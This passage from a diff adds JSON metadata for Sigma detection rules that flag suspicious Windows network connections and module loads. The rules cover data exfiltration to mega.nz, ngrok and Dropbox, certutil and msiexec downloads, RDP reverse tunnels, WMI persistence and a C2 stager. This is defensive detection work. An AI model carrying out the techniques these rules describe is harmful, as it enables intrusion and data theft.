It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Unknown" + ], + 
"filename": "image_load_wmi_module_load.yml", + "level": "informational", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded" + }, + { + "description": "Detects WMI command line event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", + "level": "high", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ] + }, + "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "value": "WMI Persistence - Command Line Event Consumer" + }, + { + "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "image_load_wsman_provider_image_load.yml", + "level": "medium", + "logsource.category": "image_load", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", + 
"https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "value": "Suspicious WSMAN Provider Image Loads" + }, + { + "description": "Detects an executable in the Windows folder accessing github.com", + "meta": { + "author": "Michael Haag (idea), Florian Roth (rule)", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown", + "@subTee in your network" + ], + "filename": "net_connection_win_binary_github_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105", + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "value": "Microsoft Binary Github Communication" + }, + { + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_binary_susp_com.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/M_haggis/status/900741347035889665", + "https://twitter.com/M_haggis/status/1032799638213066752", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "value": "Microsoft Binary Suspicious Communication Endpoint" + }, + { + "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate certutil network connection" + ], + "filename": "net_connection_win_certutil.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_certutil.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0dba975d-a193-4ed1-a067-424df57570d1", + "value": "Certutil Initiated Connection" + }, + { + "description": "Detects process connections to a Monero crypto mining pool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners" + ], + "filename": "net_connection_win_crypto_mining.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_crypto_mining.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "fa5b1358-b040-4403-9868-15f7d9ab6329", 
+ "value": "Windows Crypto Mining Pool Connections" + }, + { + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/08/17", + "falsepositive": [ + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + ], + "filename": "net_connection_win_dead_drop_resolvers.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://content.fireeye.com/apt-41/rpt-apt41", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" + ] + }, + "uuid": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "value": "Dead Drop Resolvers" + }, + { + "description": "Detects Dllhost that communicates with public IP addresses", + "meta": { + "author": "bartblaze", + "creation_date": "2020/07/13", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_dllhost_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + 
"attack.execution", + "attack.t1559.001" + ] + }, + "uuid": "cfed2f44-16df-4bf3-833a-79405198b277", + "value": "Dllhost Internet Connection" + }, + { + "description": "Detects network connections from Equation Editor", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_eqnedt.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/forensicitguy/status/1513538712986079238", + "https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "value": "Equation Editor Network Connection" + }, + { + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "creation_date": "2021/11/10", + "falsepositive": [ + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." 
+ ], + "filename": "net_connection_win_excel_outbound_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://corelight.com/blog/detecting-cve-2021-42292", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203" + ] + }, + "uuid": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", + "value": "Excel Network Connections" + }, + { + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_hh.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_hh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "468a8cea-2920-4909-a593-0cbe1d96674a", + "value": "HH.EXE Network Connections" + }, + { + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Legitimate script" + ], + "filename": "net_connection_win_imewdbld.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download", 
+ "https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "8d7e392e-9b28-49e1-831d-5949c6281228", + "value": "Download a File with IMEWDBLD.exe" + }, + { + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_malware_backconnect_ports.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "value": "Suspicious Typical Malware Back Connect Ports" + }, + { + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate use of mega.nz uploaders and tools" + ], + "filename": "net_connection_win_mega_nz.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://megatools.megous.com/", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": 
"fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "value": "Communication To Mega.nz" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate msiexec over networks" + ], + "filename": "net_connection_win_msiexec.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_msiexec.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", + "value": "Msiexec Initiated Connection" + }, + { + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/16", + "falsepositive": [ + "Legitimate use of ngrok.io" + ], + "filename": "net_connection_win_ngrok_io.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.001" + ] + }, + "uuid": "18249279-932f-45e2-b37a-8925f2597670", + "value": "Communication To Ngrok.Io" + }, + { + 
"description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/03", + "falsepositive": [ + "Legitimate use of ngrok" + ], + "filename": "net_connection_win_ngrok_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", + "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" + ] + }, + "uuid": "1d08ac94-400d-4469-a82f-daee9a908849", + "value": "Communication To Ngrok Tunneling Service" + }, + { + "description": "Detects suspicious network connection by Notepad", + "meta": { + "author": "EagleEye Team", + "creation_date": "2020/05/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_notepad_network_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf", + "https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.execution", + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "value": "Notepad Making Network Connection" + }, + { + "description": "Detects a Powershell process that opens 
network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/13", + "falsepositive": [ + "Administrative scripts", + "Microsoft IP range" + ], + "filename": "net_connection_win_powershell_network_connection.yml", + "level": "low", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.youtube.com/watch?v=DLtJTxMWZ2o", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "value": "PowerShell Network Connections" + }, + { + "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Legitimate python script" + ], + "filename": "net_connection_win_python.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", + "https://pypi.org/project/scapy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "value": "Python Initiated Connection" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/02/16", + "falsepositive": [ + "Unknown" + ], 
+ "filename": "net_connection_win_rdp_reverse_tunnel.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1096148422984384514", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "value": "RDP Over Reverse SSH Tunnel" + }, + { + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/29", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_rdp_to_http.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", + "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "value": "RDP to HTTP or HTTPS Target Ports" + }, + { + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_regsvr32_network_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + 
"https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "value": "Regsvr32 Network Activity" + }, + { + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" + ], + "filename": "net_connection_win_remote_powershell_session_network.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "value": "Remote PowerShell Session (Network)" + }, + { + "description": "Detects a rundll32 that communicates with public IP addresses", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/04", + "falsepositive": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "filename": "net_connection_win_rundll32_net_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": 
"windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.execution" + ] + }, + "uuid": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "value": "Rundll32 Internet Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "value": "Script Initiated Connection" + }, + { + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate scripts" + ], + "filename": "net_connection_win_script_wan.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_script_wan.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "value": "Script Initiated Connection to Non-Local Network" + }, + { + "description": "Detects a possible remote connections to Silenttrinity c2", + "meta": { + "author": "Kiran kumar s, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127.001" + ] + }, + "uuid": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "value": "Silenttrinity Stager Msbuild Activity" + }, + { + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_binary_no_cmdline.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + 
"https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "20384606-a124-4fec-acbb-8bd373728613", + "value": "Suspicious Network Connection Binary No CommandLine" + }, + { + "description": "Detects suspicious network connection by Cmstp", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_cmstp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ] + }, + "uuid": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "value": "Cmstp Making Network Connection" + }, + { + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/20", + "falsepositive": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "filename": "net_connection_win_susp_dropbox_api.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" + ], + "tags": "No established tags" + }, + "uuid": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "value": 
"Suspicious Dropbox API Usage" + }, + { + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "meta": { + "author": "frack113, Tim Shelton (fps)", + "creation_date": "2022/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_epmap.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/TaskShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_epmap.yml" + ], + "tags": [ + "attack.lateral_movement" + ] + }, + "uuid": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "value": "Suspicious Epmap Connection" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "value": "Suspicious Outbound Kerberos Connection" + }, + { + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "meta": { + "author": "elhoim", + "creation_date": "2022/04/28", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml", + "level": "medium", + "logsource.category": 
